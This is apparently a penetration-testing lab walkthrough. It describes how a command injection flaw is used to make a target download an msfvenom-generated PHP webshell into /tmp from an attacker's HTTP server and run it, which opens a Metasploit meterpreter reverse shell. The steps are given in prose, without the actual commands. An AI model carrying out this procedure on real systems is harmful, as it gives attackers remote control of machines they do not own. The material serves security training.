Command Injection (IV): Webshell -> Msfvenom / Meterpreter
- Layout for this exercise:
- This exercise is based on the previous one:
http://www.whitelist1.com/2018/04/command-injection-attack.html
- The goal of this exercise is to achieve a meterpreter session by injecting a PHP webshell through the attacker's URL browser.
- First of all, let's have a look at options of the reverse_tcp, available with Metasploit:
- The only option required is LHOST, corresponding to the attacker's IP.
- Based on this payload, msfvenom generates the webshell pm.php:
- Opening the file, there are a couple of characters /* that must be removed to make the PHP script executable:
- At the attacker's side, let's open a SimpleHTTPServer listening on port 8000:
- Now, it is time to launch the attack using the wget command with -O indicating the folder where to allocate the output, in this case the folder /tmp.
- Why the folder /tmp? because it is a usual writable folder in most systems, what helps to bypass the problem of finding a writable area of memory where to store our malicious webshell pm.php:
- At the attacker's side, the successful transaction is registered:
- Also, the attacker Kali can check that this phase of the attack goes well, locating the transferred webshell pm.php at the folder /tmp:
- Before running the webshell, let's open a listening session at the attacker's side (IP 192.168.1.10 on port 4444) with a Metasploit handler:
- Finally, executing the webshell pm.php with the command php -f:
- The attack is successful because a meterpreter session is immediately achieved as a consequence of running the webshell:
